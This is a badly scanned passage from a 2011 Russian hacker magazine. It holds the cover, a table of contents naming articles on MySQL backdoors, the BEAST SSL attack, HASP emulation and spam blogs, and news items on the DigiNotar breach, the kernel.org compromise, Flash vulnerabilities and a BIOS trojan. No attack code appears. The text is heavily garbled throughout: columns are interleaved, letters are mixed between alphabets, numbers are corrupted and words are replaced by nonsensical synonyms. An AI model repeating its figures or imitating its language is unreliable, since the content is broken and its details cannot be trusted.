Page 0

ВЗЛОМ

SSL:

В ТЕОРИИ касательно И НА ПРАКТИКЕ е ЖУРНАЛ

ОТ

КОМПЬЮТЕРНЫХ ХУЛИГАНОВ

FIH 11 [154] 0011

STEVEN PAULJOBS (1955-2011) РЕКОМЕНДОВАННАЯ

ЦЕНА:210р.

- e WINoowss:

---

РАЗБИРАЕМСЯ , ЧТО К ЧЕМУ

ВЗЛАМЫВАЕМ НАSР-КЛЮЧИ

- что касается

-

СОЗДАЕМ СПАМ-БЛОГ И ЗАРАБАТЫВАЕМ НА НЕМ

(game]land hi-tun medla

БЭКДОРВБД ПРОТРОЯНИВАНИЕ

MYSQL С

ПОМОЩЬЮ

ХРАНИМЫХ ФУНКЦИЙ, ПРОЦЕДУР И ТРИГГЕРОВ

О ТОМ, КАК СТАНДАРТНЫМИ ВОЗМОЖНОСТЯМИ СУБД ОСТАВИТЬНЕЗАМЕТНУЮ

ЛАЗЕЙКУ В СИСТЕМЕ.


Content

004

016

MEGANEWS Всеновоезапоследн ийм есяц

084

FERRUM

088

С приставкой Supeг Сравнительноетестирование мониторов

бери базе IРS/МVА-матриц

020

Линейка : Обзор

022

-

Buffalo NAS с яnонской

комnании

Buffalo

Шестое чувство Обзор вибронакидки Gametгix Тгuе

live sense

036

040

SuЫime Text 0, иначе говоря кунг- фуй адрес равным образом н г

DгорЬох: nуть с идеи до самого

006

SSH

Proof-of-Coпcept

HTML5

Снифер + МIТМ-атаки

=Ox4553-lnteгcep t eг

Правильные МIТМ-атаки nод Windows

PHREAKING Монитор ко каждой железке! Д елаем VGА- на ыхо д сверху

FPGA

Easy-Hack

AntiHASP

010

DLL-хардкодинг

-

Внедряем свою

UNIXOID Победаввойнезаресурсы

019

Зализываем раны

Обзорэксплоитов

Ограничиваем Linuх- n риложения на ресурсах системы По д роб н ое

how to насчёт том,

Бэкдорв БД

SYN/ACK Форт Нокс про твоей компании Создаем расnределенное тайник

GlusterFS

На страже персональныхданных Законно защищаем nереанальные данные,

MySQ L из

nомощью хранимых функций,

отнюдь не nокуnая кота на мешке

034

Энигмадлясисадмина

Ш ифруем элек т ронную n очту разными сnособами

068

lframe: з ащита равно набег

038

072

BEAST: безжалостный кража SSL - кукисов

-

FAQ UNIТED Большой FAQ

Первая работающая наступление для SSL/TLS-npoтoкoл

041

Диско

076

X-Tools

Сплоги нате WoгdPress ото Ад касательно Я Как учредить собственный nервый сnам-блог равным образом получай нем заработат ь

hacker tweets Хак-сцена на тви тт ере На нежели зарабатывают воротилы бизнеса загрузок

Программы для того взлома

078

в чем дело? долженствует д елат ь

приёмом nосле вз л ома аппаратура

данных из nомощью

029

HAS P

DLL во чужую nрограмму

014

024

nро ц едур равным образом три г геров

067

n ользователей

Кодинг глазами эзотериков

Эмулируем родничок аnnаратной защиты

Колонка редактора

Протроянивание

062

05 миллионов

инечеловеческой логики

Анализ свеженькихуязвимастей

056

СЦЕНА

Обозрение Тьюринговской трясины

Хакерекие секреты nростых вещей

050

да который не без; ними делать?

Человек ломает SAP

002

взлом 046

Вирусы в целях гуглофонов: по образу они создаются

КОДИНГ

WWW2

VNС-клиент бери

Panda, Comodo: nросто,

Microsoft

Про двухфакторную авторизацию с целью

035

ClamдV,

Больные роботы

098

Windows 0: почто нового?

Правильный вычитчик ко д а пользу кого nрограммиста

034

AVG, Avast,

Коробка на облаках

Удобные wеЬ-сервисы

030

Накорячиваем

сверхэффективно равным образом сверх извращений

Интервью из Александром <<sh2keгг>> Поляковым

Первый представление бери будущую систему

029

Ассемблером за эвристике

092

PCZONE 023

MALWARE

XSS: кросс-сайтим возьми полную! Полный путеводитель сообразно ХSS-уязвимостям

юниты

0.5

044

Г б всякой всячины

Цифры

Dropbox:

интересные данные касательно nоnулярном се р висе


MEGANEWS

WINDOWSS DEVELOPER PREVIEW вышла на свет, да исключительно из-за первые

02 часов по прошествии релиза новую ОС скачалиболее 000 000 раз.

ЕЩЕ ОДИН СКАНДАЛ

НЕЙРОСИНАПТИЧЕСКИЕ

С СЕРТИФИКАТАМИ

ПРОЦЕССОРЫ ОТ

ГОЛЛАНДСКИЙ ПОСТАВЩИК СЕРТИФИКАТОВ DIGINOTAR

РАЗРАБОТКА ЧИПОВ БУДУЩЕГО

СМАЧНОСЕЛ В ЛУЖУ

УЖЕ ИДЕТ ПОЛНЫМ ХОДОМ

IBM

а

_____ -_. . ____ ------------· ...

..... _...

...., _ .,..,_,__ ,._"

Для nравительства Н равно дерландов не· приятностьситуа­

ции заклю чаетс моя особа равно

во том, что-то

DigiNota r

впредь до недавних пор

была одно й из четы ре х ко омпаний , встроенны х в правительственную

РКI-инфраструктуру

PКiove rheid. Теnерь безопасность государственных

сайтов может быть nод угрозой .

бсолютно несостоятельным на сфере информационной безоnасности оказался голландский nоставщик сертификатов DigiNotar. В неко т ором смысле n овторилась событие со взломом сервера комnа­

равным образом

селедавателье кое nодразделение корnорации IBM в сотрудничестве со рядомуниверситетов nредставило новоеnоколениезксnериментальныхкомnьютер­

ных чиnов, созданныхдля эмуляции работы головного мозга

нии Comodo. Атака, наnравленная н а DigiNotar, была осуществлена уже на

человекавnроцессевосnриятия,действияиnознанияновой

июле, при всем том во центре сертификации nоnытались прикрыть зтотфакт, попервоначалу

информации. Пока этолишь nрототиnы, однако, еще рабочие.

отрицая nроблему, а nотом заявляя, зачем постоянно мошеннические сертификаты за­

Новые чиnы малограмотный со держат на себя каких-либо биологических

блокированы . П озже выяснилось, который был сгенерирован 031 подложный SSL

элементов, тем не менее обладаютих свойс твами. Внутри чиnов

равно EVSS L сертификат, во так сезон вроде изначально гурьбой сохатый об создании 047

естьтакназываемоенейросинаnтическоеядр~созданное

фей ков. Злоумышленники генерировали сертификаты во перемещение трех дней.

изкремниевыхструктуриинтегрированнойnамяти,вос­

Подделки были созданы наравне в целях круnных комnаний, таких как бы Yahoo!, Google,

nрои зводящей мозговые синаnсы вычислительного блока,

Mozilla, Microso f t !включая сертификаты с целью службы Windows Updatel, Skype, Facebook да Tw i tteг, эдак равно для того доменов сnецслужб, н аnример, чтобы сайтов ЦР У lc ia.gov l, MИ-6I sis.gov.uk l равно Моесад l mossad.gov.il l . Сnисок nолучен благо­

имитирующего нейроны, равно коммуникационной области, вос­

даря содействию nравительства Нидерландов , которое инициировало

nроизводящей мозговые аксоны. Чиnов nока двум , да и оный и другой имеют ядра, созданные бери базе 05-нанометровой технологии

001-

зе ро в, ра зумеется, исключили DigiNotaг изо сnиска доверенных создателей

CMOS равным образом содержащие по части 056 нейронов. Одно база со держит в себе объединение 062144 nрограммируемыхсинаnса, другое-65536 обучающихся си получай nса. В IBM говорят, что такое? чиnы на nр оведенных

сертификатов, а Голландские правительство намерены засу дить DigiNotaг, все же получи и распишись

демонстрацияхnоказалисвоюусnешностьвтакихзадача~

nроведение аудита удостоверяющего центра DigiNotar. Разработчики брау­

серверах центра сертификации невыгодный обновлялось ПО , равным образом наnрочь отсутствовало

наравне навигация, машинное видение, ассоциативная nамять равным образом

антивирусное ПО. Пока nравительство страны непостоянно взяло целое оnерации,

другие. В будущем для базе созданных nроцес саро во nланируют

nроводимые D igi N otaг, получи и распишись себя.

создаватьтак называемые << nознающие комnьютеры>>.

-

MyS~ БОЛЕЕ 050 МЛН. СКАЧИВАНИЙ

:::.

-

SAMSUNG НАМЕРЕНА ОТКРЫТЬ ИСХОДНЫЙ КОД

ВЗЛОМАН САЙТ MYSQL.COM.

В ELCOMSOFТ НАУЧИЛИСЬ

набрала игрушка Angгy Biгds

Хакеры nопали со ь безо

ВЗЛАМЫВАТЬ ПАРОЛИ

ВЫШЕЛ PARALLELS DESKTOP7 ДЛЯ МАС.

через комnанииRоviо MoЬile.

своейсобственноймобиль-

выдумки : они nросто переменять

BLACKBERRY, исnользуя

Новинка может похвастать

Ежедневно народище проводят

нойоперационнойсистемы

направлялиnосетителей

данные, хранящиеся нате

побольше нежели

ради игрой на << Птичек» nо ряд-

bada. После сего использо-

налевыйсайтиnытались

карте nамяти . 0-символьный

МОЖНОСТЯМИ, улучшеННОЙ

ка

вать ОС смогут равным образом иные тратить

их nротроянить со nомощью

nараль восстанавливается

nроизводительностью равно

изводители смартфонов .

сnлоитпака

следовать считанные склянка .

многим другим.

000 млн.

минут.

Blackhole.

00 новыми воз-

ХАКЕР

01/154/2011


MEGANEWS

СУТКИ НЕСЛОЖНОЙ DDOS-ATAKИ СТОЯТ ДОВОЛЬНО ДЕШЕВО: примерно$50 .

ЛОМАЮТ

«ЖЕЛЕЗНЫЕ»

ДАЖЕ ЗНАМЕНИТОСТЕЙ

АНТИВИРУСЫ

ХАКЕРЫУКРАЛИ У АКТРИСЫ СКАРЛЕТТ ЙОХАНСОН ФОТО В СТИЛЕ НЮ

НЕМНОГО РАЗМЫШЛЕНИЙ О ЗАЩИТЕ БУДУЩЕГО

н

едав н в отношении комnани~ lпtel гурьбой _::McAfee анон-_ сировалитехнологиюа nnар атноиантивируснои

защиты

DeepSAFE, котора~ будетреализована в lntel. Суд~ по мнению всему, гр~детнека~

новых модел~х процессорав

аnnаратна~ << nр ослойка» междупроцессаром да операцион­ ной системой . Были да представлены новые 02 н м nр оцес­ сары lvyBгidge равным образом оnисана технологи~ защиты отnовышени~ nривилегий

SMEP. SMEP контролируетуровень nривилегий

равно сnо лн ~емого ко безусловно , размещенного во адресном nространстве,

выделенномдл~ работы nрограммам.При активации

SMEP

аnnаратураантивируснойза щ итыразрешаетnроцессорувы­ n олн~ть nр ограммы с э т ого nр остранства всего суровнем

nривилегий 0-в nротивном случае возникает исключение,

равно производство nрограммы блокируетс~.Хот~данна~ аnпаратура представлена только лишь сейчас, на официальнойдокументации

lnt el сие решениеуже нашлодокументальное отражение. В новой редакции [том ЗА, май 00111 глотать nолное оnисание ра­ боты данного оборудован и~, котяга орого вnолне доста в таком случае чнодл~ сторо нни х фирм равно их разработок . Н е~сно nока, ~вл~етс~ ли SМ ЕРч астьютехнологии

DeepSAFE. На nрезентации об этом

неуnоминалось, равно наличность двух схожихтехнологий во в рассуждении дн ом nродукте маловеро~тно . Нелишне заметить, зачем во начале лета

по~ вилась стать~ l www. q ipeгd г ive г. г u/пo d e/З I не без; nодробным какихтолько взломах наш брат неграмотный nишем нате страницах][, однакотакогодаже у нас е щ е отнюдь не было. Весьма комична~истори~nриключиласьвэтоммес~цепоту

сторонуАтлантики.Известна~голливудска~актрисаСкалетт

00

секунд Ральфа-Филипnа

своим участием, всё-таки какснимки nоnали во Интернет-было

ца Иоэзо сверху хакинг

загадкой. Дело во том, чтофотографии Скарлетт делала сама, сверху

i PhoneЗGS на рамках

iPhone и, разумеете~, никуда их н е выкладывала.

русных атак , вдобавок были nредоставлены работосnособные << виртуальные >> макеты таких устройств защиты.

ушло у команды

ЙохансонвнезаnнообнаружилавСетиэротическиефотосо

являвшийся личной собственностью

оnисанием возможных алгоритмов аnпарат н ой защиты через ви­

Вейнмана равно Винчен­

соревнования

Pwn2own.

Шокированна~ звездатут а отход илась ни мно го ни бедно во

ФБР, от требованием разобратьс~ во nроисход~щем безобразии. Комnетентныелюди изо «ор ганов» разобрались равно сообщили,

что такое? сие производство хакера, ко т орый, судилище ~ п по части всему, от n ециализирует­

с~ назнаменитост~х. Помимо Йохансон во сnиске nострадавших также числ~тс~ паче

00 звез д , сре ди которыхДжессикаАль­

ба, КристинаАги л е р а равно М ила Кунис. У всехдевушектоже были украдены личные данные, видеозаnиси да фотоснимки. ФБР, кстати, грозно сообщает, чтоуже до смерти недалече для раскры т ию

nр естуnле ни~ . А nока nравоохранительные гам ганы ищут вино­ вных, мы, конечно, невыгодный можем nр ~татьоттеб~ прекрасное, опять-таки

его нате страницах нашегожурнала бываеттак скудно :1.

$'0000ПОТРАТИЛОРУКОВОД­ СТВОFАСЕВО0К следовать первыетри недели во рамках работы про­ граммы в соответствии с выплатеденежных

вознаграждений людям, которые сообщают что касается ба г ахти на сайте социальной сети. Уже есть и домашние рекордсмены -один че­

ловек общо получил

АВТОР JAILBREAKME.COM,

00ЛЕТИСПОЛНИЛОСЬ

выявив

знатный «яблочный

LINUX. B 0991

В общей сложности вознаграж­

взломщик-Николас

ЛинусТорвальдсобъявил

дениеуже успели выудить

исследователииз16различных

«Comex» Аллегра-теперь будет нести протоколы и заботы на Apple. Нач­

тотипановойоперационной

стран .

несть дьявол со должности стажера.

системы Liпux.

006

$7 000, 6 разныхуязвимостей.

году21-летний

осозданиирабочегопро­

ХАКЕР

01 / 054/2011


MEGANEWS

01 ИГРУ СДЕЛАЛА КОМАНДА РАЗРАБОТЧИКОВ

предварительно того, во вкусе разработалаАngгуВiгds .

ПЛАНШЕТ AMAZON KINDLEFIRE-OГOHb! УСПЕХИ ЧИТАЛКИ KINDLE ВДОХНОВЛЯЮТ КРУПНЕЙШИЙ СЕТЕВОЙ МАГАЗИН НАДАЛЬНЕЙШИЕ СВЕРШЕНИЯ

ко

а киетолько слухи безграмотный циркулировали во Сети касательно грядущего релиза планшет н ика ото колтун п ании Amazoп. Тем безграмотный менее, вплоть до самой презентации что касается нем далеко не было кого хочешь спроси на деле ни плошки конкретно­

го, а презентация показала, сколько изумительный м нагом ошибались хоть такие именитые издания, вроде

TechCrunch. Итак, построение короче рабо т ать п од уп раелен равным образом ем

Aпdгoid, одначе дебаркадер до чертиков не шутя модифицирована умельцами

Amazon. В частности, никакого тебе AпdroidMaгket -только собственный магазин приложений с Amazon. Хорошо известно, ч т по отношению Amazon неграмотный собирается выручать нате самих девайсах. Н апротив, сплошь и рядом шатия-братия продает устройства подешевле их себестоимости, со лихвойотбивая разницу позже- на п родаже конте н та . Созда т ь универсальную вентерь удобного рас п рос т ране н ия

контента - главная расчёт Amazoп. Главным предназначением Kindle Fiгe станет издержки различного мультимедийного контента: проелушивание музыки , считка книг, ошибка фильмов. Д ля каждого с сих типов конте н та у Amazon поглощать собственный магазин. Устройство оснащено емкостным 0-дюймовым цветным сенсорным IРS - дисплеем из разрешением 0024 х 000 пикселей да под­ держкой multi-touch. Планшет построен возьми двухъядерном оборона ц ессаре Tl ОМАР

01 ГГц l равно оснащен 0 Г б встроенной nамяти. Из беспроводных возможностей предусмотрена крыша Wi-Fi 002.11 Ь/g/n. Относительно ЗG дела сле­ дующая: пока, вроде еще было сказано вам ш е, форма предлагается всего на WiFi версии. Согласно информации совершенно т ого но издания TechCrunch, модифика­ ция от Wi F i+ЗG , должно быть , появится позднее . Интересно, достаточно ли доступна опция бесплат н ого ЗG в соответствии с всему миру? Если получи обычном Kindle серфить было, добродушно

говоря, н еуд обно !все-так равным образом методика элек т ронной бума г да безвыгодный про сего ! , то KindleFiгe готови т во этом смысле натуральный прорыв. Идея заключается во том, чтобы малограмотный вырывать пользователя занимать многочисленные отдельные элеме нт ы страниц да т ратить миг н а их ре нд ерин г держи самом д евайсе. Amazoп

тепер ь буд ет производить рендери н г страниц получи и распишись собст во енных серверах Е С2 и доставлять бери устройства готовые изображения. П что касается сути, Amazoп собирается

кешировать авторитет ь Инт ернет да д ос т а вл ять сии со т ра н равно цы н а Kiпdle Fi re со своих серверов . Эта технологию н азывае т ся Amazoп Silk. Н а п оследок отмечу, что помимо планшета были представле н ы новые версии обычной читалки Kiпdle.

Е е тепе рь не запрещается дать на лапу -д е р жись нате стуле - следовать $79 ! И хоть бы Amazo п никак не д о­

amazon.com® "

сп

став л яе т их для п рямую на Р оссию, третьяк нетрудно позволено наложить запрет посредством сервисы­

Продажи планшета Кiпdl e Fi г e, ко оторый Джефф Без ос представил публике лично, стартуют 05 ноября те для ущего года, а предшествующий индент доступен у но в ту же минуту .

посредники видать www.shipito.com .

Ц е для устройства составит сумме $199.

НАШИ НА

03

EKOPARTY

В Буэ н ос-Айресе для ш ла конфере нц ия Ekoparty-caмoe главное действие про латинской Америки во области ИБ . Событие изначально носило повышенно гаражный нрав равно

вопль г а н изовалось исключ ит е ль же н а сре д ст во а энтуз да астов. Тепер ь но

во конференции ежегодноучаствуютболее 0000 человек, а именитые докладчики самочки выстраиваются во очере д ь, воеже п ре д назначать близкие

иссле д ования держи Ekoparty. Спонсорами конференции систематически выступаюттакие компании, как ES ET, lmmunity, CORE, Microsoft, Google, lntel равно TippingPoint. В этому годунакон ц еренциибылонемалоинтерес н ых д окладов,в т омчисле и с русских nарней Жени Р одионова равным образом Са ш равным образом Матросова, которые рас­ сказали насчёт различных nодходах ко обходу п рове р ок ц да ф ро во ой п одписи для мо д ульишко автор этих строк др а нате 04-битных ве р сиях

Win dows равно n риве л равно около ме р ы

реаль н ых вредоносных ради г рамм, использующих сии уязвимости.

Вnрочем, настоящей изюминкой конферен ц ии стал докла д об усnешной технике атак получи и распишись акт SS L из н азванием <<B EAS T». Об этой новой атаке т ы може ш ь п касательно д роб н в отношении п ро чит ать на этом во ы пуске : йес л равно за­

интересовался,тоскорееоткрывай72стра н равным образом ц у!

008

ХАКЕР

01 / 054/ 0011


MEGANEWS

ЕЩЕ

0 023ПАТЕНТАПРИОБРЕЛАКОМПАНИЯ GOOGLEYIBM. (lатентные войны набирают обороты .

ГРОМКИЕ ВЗЛОМЫ ПРОШЛОГО МЕСЯЦА

,~~·

УЯЗВИМОСТЕЙ

ДЛЯ ТОРРЕНТОВ И

Adobe

В

LINUX ОСЕНЬ НАЧАЛАСЬ С ПРОБЛЕМ

БОЛЬШЕ400

ADOBE FLASH

ХОРОШОЗАНИМАТЬСЯ ФАЗЗИНГОМ, ЕСЛИ

r

РАБОТАЕШЬ В GOOGLE

а

овеем внове вышло очередное пополнение

Adobe Flash 01 0.3.183.5), во котором было официально устранено 03уязвимостей, 02 с которых имеют характеркритическихnроблемипозволяюторганизоватьвы­

'

Protectюn

@ Pnvacy

что до WМNII\G! 05 infectlons FO<Гd!!!

nолнение стих nри открытии nользователем оnределенного

ГAmqth!t.иtsc.\~~-(16).wuses(I8),.М..(4), ."..(S).!:r~CDC!hes (2)WI!fed!teded.

репорт? Затем, бесценный читатель, что-то сослужебник Google Тейвис

Possible."-m~:

0 S)'5teal.tt~ е

..................

Systeмst.~foi!Ьe

Flаsh-контента. Зачем наша сестра nриводим здесьэтотстандартный Орманди заявил, сколько целое сие неnравда равно что такое? в самомделе в nоследнемобновленииnо~ихомубылоисправленоболее400

!четырехсот, сие безграмотный оnечатка) nотенциальныхуязвимостей . Давай разберемся, из каких мест Орманди взял такую цифру,

e s..-O w.emetcor«Ьanlass

--·

Q v.us~cn)'(Uf'letМxk

Ott/' Settngs

R:l5strrrftjyf~ttwi:J'OLic:lмr)QJ'~fr0114the

что нашли такое наличность ба го на равным образом n ри нежели тогда не выделяя частностей

Google. Для

азы нужно сказать, зачем Тейвис Орманди ­

субъект здорово известная. К nримеру, вовсе недавно, на

BlackHat 0011, дьявол изобличал антивирусное решение Sophos. Тогда Орманди продемо н стрировал аудитории, зачем на что до n ерационных системах Windows Vista от колтун nа нии

да повыше узел борьбы вместе с эксnлойтами загружается, nод­

ключается ко во всем работающим nроцессам, однако вообще Прони для новение х а керов нате kernel.org относительно от тав алось незамеченным ко а для самое меньшее 07 дней ! Однако ра з · работ чики брики автор др а у во ер е н ы , ч так ата ку ющи е неграмотный м огли на н сделал ти от для рыт ы е течение ен е ния на для од ядра.

бездействует. Также некто сообщил, который большинства антиви­

русных сигнатур отнюдь не касалась сторона человека, даже если

Sophos

заявляет обратное. Словом, ему далеко не nривыкать коnаться в чужих nрограммах равно обыскивать во них изъяны.

разунесколькимигромкимихакамиознаменовалосьначалоосени.

Теnерь вернемся кАdоЬе

Flash. Дело на том, почто Google

Сначала неизвестные злоумышленники подпортили бытье любителям

nоставляет Flаsh-плагин на составе своего браузера Chгome.

файлообмена, взломав сайты bittoггeпt.com да utoггeпt.com . Стан­

Сообщив миру, в чем дело? комnания

Adobe кое-чего недоговаривает,

дартные программные загрузки обеих ресурсов заменили фейковы м антиви­

Орманди равно Ко были вынуждены раскупорить другие под­

русом, известным как бы Secuгity Shield . Посетители загружали малварь наместо

робности зтогодела . Оказалось, что-то самочки сотрудники

ВitТоггепt-клиентов получи протяжении нескольких часов. Затем атаки обрушились

nроинформировали

нате опенсорс-сообщество. Вотан вслед другим взлому подверглись сайты kегпеl . огg ,

обнаружили из nомощью фаззинга. Размах внутреннего ауд ита,

liпuxfouп d atioп . o г g равно liпux . com . В первом случае атакующим посчастливилось нахватать

nроведенного во Google, nоражает домысел . Так равно как

Adobe что касается сотнях д ыр,

Google

мурлыка орые самочки а их

гооt-доступ ко серверам, видоизменять системное ПО равно основать пере­

недостатка на мощностях nоисковый асур неграмотный испытывает, ис­

вьюн паралей разработчиков. В частности, атаковав ш ие заменили opeпssh­

следователямнесоставилотрудаорганизоватьграндиозное

seгveг да opeпssh- cl ieпts, а та ко но ар га н изовал да загрузку свое го скри пта чрез

тестирование, чтобы которого отобрали nорядка

систему инициализации. А пару недель погодя обнаружилось , ась? взломана

файлов. В изм нескольких недель их обкатывали нате

вдобавок инфраструктура l inuxfoundatioп . oгg равным образом социальной бредень L i пux . com . Под­

nлeepe на кластере с 0000

робности взлома временно выясняются. В доступном во сегодняшнее сезон тексте

файлы nодвергалисьоnределенным мутациям !изменениям),

уведомления сказано, ась? атаки этак связаны средь собой. Все

образуя невыгодный штатные ситуации ради выявления об ш ибок . В итоге

серверы организации

были обнаружены сотни nотенциальныхуязвимостей, вы­

Linux

Foundatioп отсоединены с Сети предварительно завершения

полнойпереустановки систем.

00.000 SWFFlash-

CPU. Участвующие во тестировании

званных выходом следовать мера буфера, целочисленными nере­

nолнениями, исnользованием nамяти nосле освобождения и т.n. Всего выявлено400уникальных си г натур, nриводящих для

крахуF~sh-nлеера . ПослеnервичнойсортировкиАdоЬеони

ДЫРКИ ЕСТЬ ВЕЗДЕ, А BOTWORDPRESS ЕЩЕ И УДОБНЫЙ

были зарегистрированы во вкусе

006 отдельных багов . Для исnрав­

ления данных ошибок, из учетом дублирования nроблем, на код потребовалосьвнести ВО изменений. Так благодаря этому но об этом нигде отнюдь не сообщалось? Компания

0,.7°/о ИЗ МИЛЛИОНА САМЫХ

ПОПУЛЯРНЫХ САЙТОВ В

МИРЕ РАБОТАЮТ НА ДВИЖ­ КЕ WORDPRESS, СООБЩАЕТ . НАМ WORDPRESS.ORG 01 0

Adobe до этого времени а прокомментировала ситуацию равным образом

пояснила:

не давать покоя СVЕ-отчеты по отношению данных ошибках малограмотный стали, таково как,

сообразно ми н ию

Adobe, CVE отражает информа ц ию касательно всенародно

известных ошибках, на ведь момент какданные дыры были вы­

явлены около больше всего внутреннем тестировании

ISPLC-Adobe

Secuгe Pгoduct Lifecycle) . Adobe заводит CVE во двух случаях: при поступлении информации абуязвимости наруже да подле

исправленииzего-dаууязвимостей.Дляпроблем,найден­ ных во процессе разработки продукта,

CVE малограмотный заводятся,

иными словами, уязвимости исправляются молча.

ХАКЕР

01 / 054/ 0011


MEGANEWS

~~ЛАБОРАТОРИЯ КАСПЕРСКОГО>> СТАЛА ПОСТАВЩИКОМ ЗАЩИТНЫХ ПРОГРАММ пользу кого отечественного Министерства обороны .

GOOGLE WALLET НАЧАЛ

ТРОЛЛЕЙ САЖАЮТ

РАБО Т У

В ТЮРЬМУ

И ОБЕЩАЕТ ОТПРАВИТЬ НА ПОМОЙКУ ПЛАСТИКОВЫЕ КАРТЫ

СЕТЕВОЕТРОЛОЛОУЖЕНЕПРОХОДИТБЕЗНАКАЗАННО от аз многогрешный у нас во стране малограмотный прецедентарное право, по сию пору

эквивалентно запрещено невыгодный наметить приключение произошедший

намедни во Брита нии .

03 сентября

британский

суждение приговорил 05-летнего а н гличанина Шана Д аффи для

08 неделям тюрьмы следовать строгий тролли н г во

И н тернете. Не

условно. И нужно заметить, аюшки? получил т ролль следовать дело. На значимость мишени к своих издевок Даффи избрал родственников покойной Наташи Макбрайд. Девочка

05

планирование бросилась по-под подкидыш на День Святого Валентина, позже

что такое? ее братва да семейство использовали ее страницу во

Т ар

to рау with Citi® the Google Prepaid Card.

Facebook ради обмена соболезнованиями . Д аффи

MasterCaгdiA1 по части г

малограмотный знал

деву ш ку лично, а оборона ее погибель равным образом совсем услы ш ал изо ново­ стей . Тем малограмотный менее, трол л ь никак не поленился зайти на

Learn how it works ,

Facebook

равно писать держи « стене» Наташи: << мы легко задремала возьми

рельсах» да << мама, в этом месте на аду жарковато». Родственники покойной не проронив звука сносить безвыгодный стали да махом обратились в nолицию, которая жуть амором отыскала << ш ут н ика».

Тролль Даффи оказался зрелищем около а н ек д отическим :

ко

омпа н ия

Google парадно запустила свой Google Wallet

небывалый услуга мобильных платежей

-мобильное приложение, не без; через которо-

го дозволяется выплачивать покупки во магазинах быть помощи

смартфона,посредствомбесконтактнойтехнологии

Nеаг

Field Commuпication INFC). С через Google Wallet

п ользователю про оплаты товаров равно услуг нужно чуть

п риложи т ь смартфон не без;

N FС-чипом

ко специальному считы­

толстым, прыщавым, живущим бери воспособление п по отношению безработице.

В по части сн ов е в диковинку г о с ерв иса ле жит

И даже если в суде столп пыталась доказать, почто <<бедняга »

техн ология

NFC (NearFieldCommunication), которая дает

страдает синдромом Аспергера равным образом алкоголизмом, вывод малограмотный

поверил равным образом снисхождения ко троллю никак не проявил. Вердикт:

умереть и невыгодный встать зм в отношении ж так ст ьоб промен

месяцев тюрьмы равно

данными меж ду

0 полет не принимая во внимание доступа

08

для социальным сетям.

бл изк в отношении р мастер своего дела поло жен­

Интересно равно то, сколько судили Даффи соответственно самому обычному

ными ( нескол ько са нтиметров ) устройствами .

обвинению-за агрессия во отдельно грубой форме. Суд не усмотрел несчастный фон во том, зачем осквернение было

вающему устройству равным образом установить РIN-код, со временем аюшки? финансы

нанесено на интернете да анонимно.

после покупку сnисываются со кредитной карты. Этутехноло­

гию многие ведущие компании рассматривают как бы более удобную альтернативу т ра д иционным банковским картам. Правда, п ока

Google Wallet р або т аеттолько

во США, идеже вос­

пользо во а ть ся им мож н об на торговых точках со платежными

термина л ами MasteгCaгdPay P ass, которых насчитыва­ ется близ

050 т ысяч.

Сейчас

Google Wallet поддерживает

nлатежи лишь только вместе с помо щ ью д вух типов карт - кредитных

MasteгCaгd через жестянка

Citi

равным образом виртуальных

Google

PгepaidCaгd,

ба л анс ко т по отношению р ых мож н по части объединение п ол н ить со всякий пластиковой карты. В буду щ ем пре д ста на ители

Goog le обещают до­

бавить до д держку кapтVisa, Ameгican Expгess равно Discoveг. Еще одно ограничение: для г рамма во известный час может работать исключительно сверху смартфонах

Nexus 0 0G.

Но во будущем

планируется раздолбить за дд ержку получи и распишись кое-кто смартфоны с чипом

NFC.

.. .

ИМУЩЕСТВОХАКЕРА nошло от молотка по части его

t

но соб со твенной инициа ­ тиве . Все вырученные средства что касается т nродаж и недвижимости равно авто­

мобилей , по отношению цененные во

0

млн . рублей , были nере­

012

nравлены на Royal Bank of Scotland, nострадавш равно й

СОРЦЫDООМЗ будут

03% ВСЕГО ВРЕМЕНИ

оnубликованы на от­

винтернетезаnадные

с хакера . Интересно,

рытом дост у nе накануне конца

Юзеф еры nроводят во соци­

для акую доза убытков

годы , сообщил вожак

альных сетях да благах,

некто таки м образо м туман

комnан ии id Softwaгe

говорится во отчете

nокры т ь?

Иван Кармак .

комnании

Nielsen.

ХАКЕР

01/154/2011


ПОЧТИ 0 МЛН. КЛЮЧЕЙ К ИГРЕ DIRT 0 СЛУЧАЙНО ~~ПОТЕРЯЛА>> общество AMD. Базаутекла из сайта AMD4u .com .

МАЛВАРЬ ПРОЛЕЗЕТ ДАЖ Е В

BI OS

ТРОЯ Н С НЕ СОВСЕМ СТАНДАРТНЫМ ФУНКЦИОНАЛОМ НА Ш Л И ЭКСП ЕРТЫ

КИТАЙСКОГОАНТИВИРУСНОГО ВЕНДОРА Plюe11ix - A~o~ard

Auto Save Load last

bootaЬie bootaЬie

setti11g E naЬied setting Load

standard bios default ·- Descr i pt iоп

_j

Wl1e11 tl1i s

----1

enaЬied,

Ba11k descr i pt ion Save to tllis Ba11k Load from tl1 is Bank Hotkey=> 0 L _ _ Opt ions ___J

llscr ilef ined settiny Bank 02===--, Dr:scription 0 , - Options ---i 2686 068х16 Bank description 2-1- 0-6 0. 0vl166 )223 Save to t l1is Bank Load from tl1is Bank Hotkey=> 0 1·-- Description _ j L _ _ Opt ions ___j Enter:Select f..IS.:sofrevious Va lues

пытался башли ­

из воей но р т вам , а

Lcve 0

э т касательно на л екл что касается после внешне

iteм

it

ра з р у шительные

io

посл е дствия :

~o~ i l l

BIOS

перезаписывался,

autoмatically s д ve

да для что касается м пьют е р позднее

yotlr last bootaЬi e CMOS setti11g to 'Backllp Bank' if the setting сопение boot your systi:m successfully .

сего пуще неграмотный

i

tt~• : llove

BIOS безвыгодный

же во а . Еще во 0999 годувирусСIН пулировать BIOS

Save sett ing to Ba11k IJi tl1 Curre11t set t i 01g ·:.,т ,kfiнeil settio1y HctнJ.: "' "···-""\ г----~-IJptloнs

ма лваря на

lte11 Help Ме н"

t·~·, ~-~pt_iJ)!}

Идея внедрения

WorkstationBIOS CMOS Setllp Utility CMOS Re loaded

з агру ж ался .

шеллегким путем, переложив по сию пору основные задачи получи и распишись самопроизвольно

BIOS. Он вос­

пользовался результатами работы китайского исследователя, извест­ ного подником lceloгd . Работа была проделана пока что во

0007 году: тут-то при BIOS был обнаружен бездействие способ перепрошивки микросхемы чрез сервис, предоставляемый самим BIOS в SMM ISystem Management Mode]. Программный кодSММ во SMRAM не виден операционной системе !если BIOS написан корректно, ход для

анализеутилиты WinflashдляAwaгd •

+/-/PUIPD:Value F10:Save ESC:Exit Fl:General Help F6: Fail-Safe Defaults F7: О ti•ized Defaults

этой памяти заблокирован] равно исполняется объективно с нее. Назначе­ ние данного стих смертельно разнообразно: сие эмуляция малограмотный реализованных

итайский производительантивирусов 060 сообщает, чтоэкс­

